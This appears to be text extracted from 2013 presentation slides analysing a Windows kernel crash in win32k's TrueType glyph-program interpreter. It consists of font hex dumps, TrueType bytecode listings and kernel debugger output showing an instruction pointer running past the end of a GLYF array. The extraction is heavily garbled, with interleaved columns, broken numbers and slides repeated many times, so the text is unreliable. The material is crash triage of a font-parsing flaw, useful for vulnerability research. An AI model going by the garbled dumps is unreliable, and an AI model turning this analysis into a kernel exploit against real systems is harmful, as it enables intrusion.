00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00000:
00002:
00004:
00005:
00006:
00008:
00009:
0000A:
0000B:
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
PUSHB 0
PUSHB 0
WS
FLIPOFF
PUSHB 0
RS
RCVT
FLIPON
PUSHB 0
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00000:
00002:
00004:
00005:
00006:
00008:
00009:
0000A:
0000B:
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
PUSHB 0
PUSHB 0
WS
FLIPOFF
PUSHB 0
RS
RCVT
FLIPON
PUSHB 0
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00000:
00002:
00004:
00005:
00006:
00008:
00009:
0000A:
0000B:
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
PUSHB 0
PUSHB 0
WS
FLIPOFF
PUSHB 0
RS
RCVT
FLIPON
PUSHB 0
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00000:
00002:
00004:
00005:
00006:
00008:
00009:
0000A:
0000B:
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
PUSHB 0
PUSHB 0
WS
FLIPOFF
PUSHB 0
RS
RCVT
FLIPON
PUSHB 0
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00000:
00002:
00004:
00005:
00006:
00008:
00009:
0000A:
0000B:
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
PUSHB 0
PUSHB 0
WS
FLIPOFF
PUSHB 0
RS
RCVT
FLIPON
PUSHB 0
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
BUCKET_ID:
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
Followup: MachineOwner
--------kd> .tss 0x28
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> D 013abaf2
013abaf2 b0 00
013abb02 b0 17
013abb12 50 61
013abb22 61 20
013abb32 b0 03
013abb42 01 43
013abb52 61 5c
013abb62 42 b0
Friday, March 8, 2013
b0
23
b8
b0
23
b0
b0
50
00
78
ff
01
42
02
2b
61
42
b0
df
61
b0
43
23
5c
4e
00
23
45
01
61
78
b0
b0
43
78
b0
43
b0
b0
31
00-43
b0-01
b0-80
01-23
b0-00
0d-23
00-43
23-78
45
60
1c
42
50
78
b0
b0
4d
20
b0
45
5c
b0
01
01
b0
b0
00
b0
b0
01
60
b0
00
00
43
02
18
43
20
02
43
23
20
23
23
b0
b0
43
45
42
b0
42
78
03
00
42
61
b0
01
45
b0
43
23
b0
....BN..CEM..CEa
..#x..C..` ..#B.
Pa...#x.....C ..
a ..aE..#BE..#BE
..#B..C..P\..#x.
.C..Ca..#x..C..C
a\.+#x..C..` ..#
B.Pa\.1#x....CB.
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
BUCKET_ID:
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
The pointer argument to
Followup: MachineOwner
---------
win32k!itrp_ExecuteGlyphPgm
kd> .tss 0x28
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> D 013abaf2
013abaf2 b0 00
013abb02 b0 17
013abb12 50 61
013abb22 61 20
013abb32 b0 03
013abb42 01 43
013abb52 61 5c
013abb62 42 b0
Friday, March 8, 2013
b0
23
b8
b0
23
b0
b0
50
00
78
ff
01
42
02
2b
61
42
b0
df
61
b0
43
23
5c
4e
00
23
45
01
61
78
b0
b0
43
78
b0
43
b0
b0
31
00-43
b0-01
b0-80
01-23
b0-00
0d-23
00-43
23-78
45
60
1c
42
50
78
b0
b0
4d
20
b0
45
5c
b0
01
01
b0
b0
00
b0
b0
01
60
b0
00
00
43
02
18
43
20
02
43
23
20
23
23
b0
b0
43
45
42
b0
42
78
03
00
42
61
b0
01
45
b0
43
23
b0
....BN..CEM..CEa
..#x..C..` ..#B.
Pa...#x.....C ..
a ..aE..#BE..#BE
..#B..C..P\..#x.
.C..Ca..#x..C..C
a\.+#x..C..` ..#
B.Pa\.1#x....CB.
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
BUCKET_ID:
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
Followup: MachineOwner
00000: PUSHB 0
--------00002: PUSHB 0
The pointer argument to
win32k!itrp_ExecuteGlyphPgm
00004: WS
kd> .tss 0x28
00005: FLIPOFF
eax=e2481f84 ebx=e2481afc
ecx=e2482084
edx=00000001 esi=e2481fe0 edi=013abb94
00006: PUSHB
0
eip=e2482368 esp=b2077000
00008: RSebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
00009: RCVT
cs=0008 ss=0010 ds=0023
es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff0000A: FLIPON
call
e2482368
0000B: PUSHB 0
...
kd> D 013abaf2
013abaf2
013abb02
013abb12
013abb22
013abb32
013abb42
013abb52
013abb62
Friday, March 8, 2013
b0
b0
50
61
b0
01
61
42
00
17
61
20
03
43
5c
b0
b0
23
b8
b0
23
b0
b0
50
00
78
ff
01
42
02
2b
61
42
b0
df
61
b0
43
23
5c
4e
00
23
45
01
61
78
b0
b0
43
78
b0
43
b0
b0
31
00-43
b0-01
b0-80
01-23
b0-00
0d-23
00-43
23-78
45
60
1c
42
50
78
b0
b0
4d
20
b0
45
5c
b0
01
01
b0
b0
00
b0
b0
01
60
b0
00
00
43
02
18
43
20
02
43
23
20
23
23
b0
b0
43
GLYF Program from TTF
45
42
b0
42
78
03
00
42
61
b0
01
45
b0
43
23
b0
....BN..CEM..CEa
..#x..C..` ..#B.
Pa...#x.....C ..
a ..aE..#BE..#BE
..#B..C..P\..#x.
.C..Ca..#x..C..C
a\.+#x..C..` ..#
B.Pa\.1#x....CB.
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
BUCKET_ID:
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
Ok, so what’s this?
Followup: MachineOwner
---------
kd> .tss 0x28
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> D 013abb9b
013abb9b 31 37
013abbab 09 00
013abbbb 0c 00
013abbcb 03 00
013abbdb 09 00
013abbeb 18 00
013abbfb 03 00
013abc0b 70 00
Friday, March 8, 2013
01
00
66
01
04
9c
01
79
01
00
00
04
00
00
04
00
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00
00
00
01
03
66
01
07
69
00-08
00-03
04-09
00-1c
00-03
04-09
00-62
00-67
00
00
00
00
00
00
00
00
66
01
02
80
01
06
b4
68
00
04
00
00
04
00
00
00
03
09
0e
03
09
0c
43
74
00
00
00
00
00
00
00
00
01
01
72
01
05
66
6f
20
04
00
00
04
00
00
00
00
17........f.....
....f...........
..f...........r.
................
......f.........
..............f.
........b...C.o.
p.y.r.i.g.h.t. .
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
BUCKET_ID:
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
Ok, so what’s this?
Followup: MachineOwner
---------
kd> .tss 0x28
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
Points to the exact end of the
GLYF
instruction
array
kd> D 013abb9b
013abb9b 31 37 01 01 00 00 00 00-08 00
66 00 03 00 01 04 17........f.....
(3BAE4+A9)
013abbab 09 00 00 00 66 00 00 00-03 00 01 04 09 00 01 00 ....f...........
013abbbb
013abbcb
013abbdb
013abbeb
013abbfb
013abc0b
Friday, March 8, 2013
0c
03
09
18
03
70
00
00
00
00
00
00
66
01
04
9c
01
79
00
04
00
00
04
00
03
09
0c
03
09
72
00
00
00
00
00
00
01
03
66
01
07
69
04-09
00-1c
00-03
04-09
00-62
00-67
00
00
00
00
00
00
02
80
01
06
b4
68
00
00
04
00
00
00
0e
03
09
0c
43
74
00
00
00
00
00
00
72
01
05
66
6f
20
00
04
00
00
00
00
..f...........r.
................
......f.........
..............f.
........b...C.o.
p.y.r.i.g.h.t. .
...
00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm|
00000070
7f 06 e9 00 00 from
00 01bf85bff7
0c 00 03
9b 67 6c 79 66 |............glyf|
LAST_CONTROL_TRANSFER:
to b8
e2482368
00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head|
...
STACK_TEXT:
0003bad0
00 00 IP
00 not
00 00
00 00
00 00 Following
00 00 00 00
00 |................|
WARNING: Frame
in 00
any00known
module.
frames
may be wrong.
0003bae0
00
5e
00
00
00
01
00
00
00
00
00
01
00
01
00
01
|.^..............|
b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368
0003baf0
00 a9 b0 013abaf2
00 b0 00 013abb9b
42 4e b0e2481f84
00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c
4d b0 00 43 |......BN..CEM..C|
b207a9c8 bf85f92f
0003bb00
45 61 b0 e248155c
17 23 78 00000001
b0 00 4300000000
b0 01 60win32k!fsg_SimpleInnerGridFit+0x103
20 b0 00 23 |Ea..#x..C..` ..#|
b207a9fc bf862709
0003bb40
78 b0 01 e2481248
43 b0 02 e2481774
43 61 b0e2481f84
0d 23 78win32k!fsg_ExecuteGlyph+0x1d3
b0 01 43 b0 |x..C..Ca..#x..C.|
b207aa94 bf85e8bc
0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..|
0003bb80
1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#|
BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...|
0003bba0
00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f|
Followup: 00
MachineOwner
0003bbb0
--------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..|
0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......|
0003bbd0
00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................|
kd> .tss 0x28
0003bbe0
00 66
00 03 00 01ecx=e2482084
04 09 00 05edx=00000001
00 18 00 9c esi=e2481fe0
00 03 |.f..............|
eax=e2481f84
ebx=e2481afc
edi=013abb94
0003bbf0
00
01
04
09
00
06
00
0c
00
66
00
03
00
01
04
09
|.........f......|
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
0003bc00
00
07
00
62
00
b4
00
43
00
6f
00
70
00
79
00
72 |...b...C.o.p.y.r|
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
0003bc10
00
69
00
67
00
68
00
74
00
20
00
a9
00
20
00
32
|.i.g.h.t.
... .2|
e2482368 e8fbffffff
call
e2482368
...
kd> D 013abb9b
013abb9b 31 37
013abbab 09 00
013abbbb 0c 00
013abbcb 03 00
013abbdb 09 00
013abbeb 18 00
013abbfb 03 00
013abc0b 70 00
Friday, March 8, 2013
Another Look At TTF
01
00
66
01
04
9c
01
79
01
00
00
04
00
00
04
00
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00
00
00
01
03
66
01
07
69
00-08
00-03
04-09
00-1c
00-03
04-09
00-62
00-67
00
00
00
00
00
00
00
00
66
01
02
80
01
06
b4
68
00
04
00
00
04
00
00
00
03
09
0e
03
09
0c
43
74
00
00
00
00
00
00
00
00
01
01
72
01
05
66
6f
20
04
00
00
04
00
00
00
00
17........f.....
....f...........
..f...........r.
................
......f.........
..............f.
........b...C.o.
p.y.r.i.g.h.t. .
...
00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm|
00000070
7f 06 e9 00 00 from
00 01bf85bff7
0c 00 03
9b 67 6c 79 66 |............glyf|
LAST_CONTROL_TRANSFER:
to b8
e2482368
00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head|
...
STACK_TEXT:
0003bad0
00 00 IP
00 not
00 00
00 00
00 00 Following
00 00 00 00
00 |................|
WARNING: Frame
in 00
any00known
module.
frames
may be wrong.
0003bae0
00
5e
00
00
00
01
00
00
00
00
00
01
00
01
00
01
|.^..............|
b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368
0003baf0
00 a9 b0 013abaf2
00 b0 00 013abb9b
42 4e b0e2481f84
00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c
4d b0 00 43 |......BN..CEM..C|
b207a9c8 bf85f92f
0003bb00
45 61 b0 e248155c
17 23 78 00000001
b0 00 4300000000
b0 01 60win32k!fsg_SimpleInnerGridFit+0x103
20 b0 00 23 |Ea..#x..C..` ..#|
b207a9fc bf862709
0003bb40
78 b0 01 e2481248
43 b0 02 e2481774
43 61 b0e2481f84
0d 23 78win32k!fsg_ExecuteGlyph+0x1d3
b0 01 43 b0 |x..C..Ca..#x..C.|
b207aa94 bf85e8bc
0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..|
0003bb80
1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#|
BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...|
0003bba0
00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f|
Followup: 00
MachineOwner
0003bbb0
--------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..|
0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......|
0003bbd0
00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................|
kd> .tss 0x28
0003bbe0
00 66
00 03 00 01ecx=e2482084
04 09 00 05edx=00000001
00 18 00 9c esi=e2481fe0
00 03 |.f..............|
eax=e2481f84
ebx=e2481afc
edi=013abb94
0003bbf0
00
01
04
09
00
06
00
0c
00
66
00
03
00
01
04
09
|.........f......|
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
0003bc00
00
07
00
62
00
b4
00
43
00
6f
00
70
00
79
00
72 |...b...C.o.p.y.r|
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
0003bc10
00
69
00
67
00
68
00
74
00
20
00
a9
00
20
00
32
|.i.g.h.t.
... .2|
e2482368 e8fbffffff
call
e2482368
...
GLYF is 188 bytes
3BAE4+BC=3BBA0 =
start of NAME record
kd> D 013abb9b
013abb9b 31 37
013abbab 09 00
013abbbb 0c 00
013abbcb 03 00
013abbdb 09 00
013abbeb 18 00
013abbfb 03 00
013abc0b 70 00
Friday, March 8, 2013
Another Look At TTF
01
00
66
01
04
9c
01
79
01
00
00
04
00
00
04
00
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00
00
00
01
03
66
01
07
69
00-08
00-03
04-09
00-1c
00-03
04-09
00-62
00-67
00
00
00
00
00
00
00
00
66
01
02
80
01
06
b4
68
00
04
00
00
04
00
00
00
03
09
0e
03
09
0c
43
74
00
00
00
00
00
00
00
00
01
01
72
01
05
66
6f
20
04
00
00
04
00
00
00
00
17........f.....
....f...........
..f...........r.
................
......f.........
..............f.
........b...C.o.
p.y.r.i.g.h.t. .
...
00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm|
00000070
7f 06 e9 00 00 from
00 01bf85bff7
0c 00 03
9b 67 6c 79 66 |............glyf|
LAST_CONTROL_TRANSFER:
to b8
e2482368
00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head|
...
STACK_TEXT:
0003bad0
00 00 IP
00 not
00 00
00 00
00 00 Following
00 00 00 00
00 |................|
WARNING: Frame
in 00
any00known
module.
frames
may be wrong.
0003bae0
00
5e
00
00
00
01
00
00
00
00
00
01
00
01
00
01
|.^..............|
b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368
0003baf0
00 a9 b0 013abaf2
00 b0 00 013abb9b
42 4e b0e2481f84
00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c
4d b0 00 43 |......BN..CEM..C|
b207a9c8 bf85f92f
0003bb00
45 61 b0 e248155c
17 23 78 00000001
b0 00 4300000000
b0 01 60win32k!fsg_SimpleInnerGridFit+0x103
20 b0 00 23 |Ea..#x..C..` ..#|
b207a9fc bf862709
0003bb40
78 b0 01 e2481248
43 b0 02 e2481774
43 61 b0e2481f84
